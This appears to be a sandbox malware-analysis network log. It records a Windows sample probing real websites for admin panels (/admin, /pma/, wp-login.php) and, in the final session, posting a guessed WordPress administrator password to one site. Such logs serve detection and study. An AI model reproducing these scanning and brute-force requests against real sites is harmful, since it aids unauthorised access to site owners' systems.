                                                                                                                                                                                                    2023-11-26 05:59:44 UTC175OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: www.harasduberry.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC231INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 73 74 72 69 63 74 2d 74 72 61 6e 73 70 6f 72 74 2d 73 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 36 30 34 38 30 30 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingstrict-transport-security: max-age=604800Server: nginx
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC16153INData Raw: 31 66 33 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 20 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 2e 6a 69 6d 63 64 6e 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 20 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 6a 69 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e
                                                                                                                                                                                                    Data Ascii: 1f37<!DOCTYPE html><html lang="fr-FR"><head> <meta charset="utf-8"/> <link rel="dns-prefetch preconnect" href="https://u.jimcdn.com/" crossorigin="anonymous"/><link rel="dns-prefetch preconnect" href="https://assets.jimstatic.com/" crossorigin
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC16384INData Raw: 76 61 75 78 20 c3 a0 20 76 65 6e 64 72 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 0d 0a 31 66 66 32 0d 0a 20 69 64 3d 22 63 63 2d 6e 61 76 2d 76 69 65 77 2d 32 31 31 35 39 31 35 33 37 39 22 20 63 6c 61 73 73 3d 22 6a 6d 64 2d 6e 61 76 5f 5f 6c 69 73 74 2d 69 74 65 6d 2d 30 20 6a 2d 6e 61 76 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 22 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 66 6f 73 2d 70 72 61 74 69 71 75 65 73 2d 70 61 72 2d 72 61 63 65 2f 22 20 64 61 74 61 2d 6c 69 6e 6b 2d 74 69 74 6c 65 3d 22 49 6e 66 6f 73 20 70 72 61 74 69 71 75 65 73 20 70 61 72 20 72 61 63 65 22 3e 49 6e 66 6f 73 20 70 72 61 74 69 71 75 65 73 20 70 61 72 20 72 61 63 65 3c 2f 61 3e 3c 73 70 61 6e 20 64 61 74 61 2d 6e 61 76 69 2d 74 6f 67 67 6c 65 3d 22 63 63
                                                                                                                                                                                                    Data Ascii: vaux vendre</a></li></ul></li><li1ff2 id="cc-nav-view-2115915379" class="jmd-nav__list-item-0 j-nav-has-children"><a href="/infos-pratiques-par-race/" data-link-title="Infos pratiques par race">Infos pratiques par race</a><span data-navi-toggle="cc
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC7302INData Raw: 73 20 64 65 20 63 6f 6e 74 72 5c 75 30 30 66 34 6c 65 20 4a 69 6d 64 6f 5c 6e 5c 6e 4c 65 73 20 63 6f 6f 6b 69 0d 0a 31 63 35 32 0d 0a 65 73 20 64 65 20 63 6f 6e 74 72 5c 75 30 30 66 34 6c 65 20 4a 69 6d 64 6f 20 70 65 72 6d 65 74 74 65 6e 74 20 61 75 20 76 69 73 69 74 65 75 72 20 64 75 20 73 69 74 65 20 64 27 61 75 74 6f 72 69 73 65 72 20 6c 65 73 20 73 65 72 76 69 63 65 73 5c 2f 63 6f 6f 6b 69 65 73 20 73 5c 75 30 30 65 39 6c 65 63 74 69 6f 6e 6e 5c 75 30 30 65 39 73 20 65 74 20 65 6e 72 65 67 69 73 74 72 65 6e 74 20 6c 65 75 72 73 20 70 72 5c 75 30 30 65 39 66 5c 75 30 30 65 39 72 65 6e 63 65 73 20 65 6e 20 6d 61 74 69 5c 75 30 30 65 38 72 65 20 64 65 20 63 6f 6f 6b 69 65 73 2e 5c 6e 5c 6e 50 72 65 73 74 61 74 61 69 72 65 20 3a 5c 6e 4a 69 6d 64 6f 20
                                                                                                                                                                                                    Data Ascii: s de contr\u00f4le Jimdo\n\nLes cooki1c52es de contr\u00f4le Jimdo permettent au visiteur du site d'autoriser les services\/cookies s\u00e9lectionn\u00e9s et enregistrent leurs pr\u00e9f\u00e9rences en mati\u00e8re de cookies.\n\nPrestataire :\nJimdo


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    452192.168.2.45134574.220.219.1894436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC244OUTGET /wp-login.php?redirect_to=https%3A%2F%2Fhimontessori.com%2Fwp-admin%2F&reauth=1 HTTP/1.1
                                                                                                                                                                                                    Host: himontessori.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC162INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 39 20 43 6f 6e 66 6c 69 63 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 409 ConflictDate: Sun, 26 Nov 2023 05:59:45 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC83INData Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                    Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    453192.168.2.45162034.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC175OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: www.linkan-group.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC654INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 38 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 38 34 2e 31 34 36 31 30 33 37 32 39 33 33 30 31 36 33 33 30 39 32 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 53 65 72 76 65 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Length: 2865Content-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978384.14610372933016330920Cache-Control: public,max-age=0,must-revalidateServer
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC598INData Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e
                                                                                                                                                                                                    Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" conten
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1252INData Raw: 22 20 2f 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 74 79 6c 65 73 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 6c 61 6e 67 3d 22 65 6e 22 20 6e 67 2d 63 6f 6e 74 72 6f 6c 6c 65 72 3d 22 45 72 72 6f 72 50 61 67 65 43 6f 6e 74 72 6f 6c 6c 65 72 20 61 73 20 65 72 72 6f 72 50 61 67 65 43 74 72 6c 22 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 70 61 67 65 2d 61 70 70 22 20 6e 67 2d 63 6c 61 73 73 3d 22
                                                                                                                                                                                                    Data Ascii: " /> ... --> <link rel="stylesheet" href="//static.parastorage.com/services/wix-public/1.719.0/styles/error-pages/styles.css"> ... --></head><body lang="en" ng-controller="ErrorPageController as errorPageCtrl" class="error-page-app" ng-class="
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1015INData Raw: 3e 0a 0a 3c 73 63 72 69 70 74 3e 0a 20 20 61 6e 67 75 6c 61 72 2e 6d 6f 64 75 6c 65 28 27 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 27 29 2e 63 6f 6e 73 74 61 6e 74 28 27 73 74 61 74 69 63 73 55 72 6c 27 2c 20 27 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 27 29 3b 0a 20 20 61 6e 67 75 6c 61 72 2e 6d 6f 64 75 6c 65 28 27 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 27 29 2e 63 6f 6e 73 74 61 6e 74 28 27 62 61 73 65 44 6f 6d 61 69 6e 27 2c 20 27 77 69 78 2e 63 6f 6d 27 29 3b 0a 20 20 61 6e 67 75 6c 61 72 2e 6d 6f 64 75 6c 65 28 27 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 27 29 2e 63 6f 6e 73 74 61 6e 74 28 27 6c 61 6e 67 75 61
                                                                                                                                                                                                    Data Ascii: ><script> angular.module('wixErrorPagesApp').constant('staticsUrl', '//static.parastorage.com/services/wix-public/1.719.0/'); angular.module('wixErrorPagesApp').constant('baseDomain', 'wix.com'); angular.module('wixErrorPagesApp').constant('langua


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    454192.168.2.45160213.32.208.274436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC171OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: www.perrisesd.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1145INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 36 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 31 30 2e 30 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Content-Length: 3067Connection: closeDate: Sun, 26 Nov 2023 05:59:45 GMTCache-Control: privateServer: Microsoft-IIS/10.0Strict-Transport-Security: max-age=31536000; includeSubDomain
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC3067INData Raw: 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 53 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 65 72 72 69 73 65 73 64 2e 6f 72 67 2f 53 74 61 74 69 63 2f 2f 73 69 74 65 2f 61 73 73 65 74 73 2f 53 74 79 6c 65 73 2f 73 79 73 74 65 6d 5f 32 37 34 31 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                                                                                                                                                    Data Ascii: <html><head> <link rel="Stylesheet" type="text/css" href="https://www.perrisesd.org/Static//site/assets/Styles/system_2741.css" /> <title>Error 404 - Page Not Found</title> <style type="text/css"> @font-face { font


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    455192.168.2.451428213.0.13.444436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC173OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: www.ceuandalucia.es
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC461INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34 2e 34 35 2d 30 2b 64 65 62 37 75 31 34 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:45 GMTServer: ApacheX-Powered-By: PHP/5.4.45-0+deb7u14Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.ceuandalucia.es/wp-json/>; rel
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC6INData Raw: 32 33 30 34 0d 0a
                                                                                                                                                                                                    Data Ascii: 2304
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC4773INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 20 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 68 74 6d 6c 2d 6c 6f 61 64 69 6e 67 20 77 66 2d 61 63 74 69 76 65 20 69 65 20 6f 6c 64 2d 62 72 6f 77 73 65 72 20 6c 74 2d 69 65 31 30 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 6c 74 2d 69 65 37 20 72 65 73 70 6f 6e 73 69 76 65 22 20 69 74 65 6d 73 63 6f 70 65 3d 22 69 74 65 6d 73 63 6f 70 65 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 73 22 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js html-loading wf-active ie old-browser lt-ie10 lt-ie9 lt-ie8 lt-ie7 responsive" itemscope="itemscope" itemtype="http://schema.org/WebPage" lang="es" xmlns:og="http://opengraphprotocol.org/schema/"
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC4191INData Raw: 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 0a 69 6d 67 2e 65 6d 6f 6a 69 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 77 69 64 74 68 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 61 63 6b
                                                                                                                                                                                                    Data Ascii: <style type="text/css">img.wp-smiley,img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 .07em !important;vertical-align: -0.1em !important;back
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC6INData Raw: 32 37 66 63 0d 0a
                                                                                                                                                                                                    Data Ascii: 27fc
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC5939INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6e 65 77 73 6c 65 74 74 65 72 2d 73 75 62 73 63 72 69 70 74 69 6f 6e 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 2f 77 70 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 6e 65 77 73 6c 65 74 74 65 72 2f 73 75 62 73 63 72 69 70 74 69 6f 6e 2f 73 74 79 6c 65 2e 63 73 73 3f 76 65 72 3d 35 2e 31 2e 38 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6d 6f 6f 76 65 5f 67 64 70 72 5f 66 72 6f 6e 74 65 6e 64 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f
                                                                                                                                                                                                    Data Ascii: <link rel='stylesheet' id='newsletter-subscription-css' href='https://www.ceuandalucia.es/wp/wp-content/plugins/newsletter/subscription/style.css?ver=5.1.8' type='text/css' media='all' /><link rel='stylesheet' id='moove_gdpr_frontend-css' href='https:/
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC4297INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 68 65 6d 65 2d 62 6f 6f 74 73 74 72 61 70 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 2f 77 70 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 65 6e 76 69 73 69 6f 6e 2f 6c 69 62 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 3f 76 65 72 3d 32 2e 30 2e 39 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 68 65 6d 65 2d 63 68 69 6c 64 2d 66 72 6f 6e 74 65 6e 64 2d 73 74 79 6c 65 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77
                                                                                                                                                                                                    Data Ascii: <link rel='stylesheet' id='theme-bootstrap-css' href='https://www.ceuandalucia.es/wp/wp-content/themes/envision/lib/css/bootstrap.css?ver=2.0.9.3' type='text/css' media='all' /><link rel='stylesheet' id='theme-child-frontend-style-css' href='https://ww
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC6INData Raw: 35 62 66 35 0d 0a
                                                                                                                                                                                                    Data Ascii: 5bf5


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    456192.168.2.451584172.96.186.2064436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC330OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: samson.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP+Cookie+check
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://samson.pe/wp-login.php
                                                                                                                                                                                                    Content-Length: 144
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC144OUTData Raw: 6c 6f 67 3d 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 26 70 77 64 3d 37 31 32 33 73 61 6d 73 6f 6e 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 49 6e 69 63 69 61 72 2b 73 65 73 69 25 43 33 25 42 33 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 73 61 6d 73 6f 6e 2e 70 65 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=administrator&pwd=7123samson&rememberme=forever&wp-submit=Iniciar+sesi%C3%B3n&redirect_to=https%3A%2F%2Fsamson.pe%2Fwp-admin%2F&testcookie=1
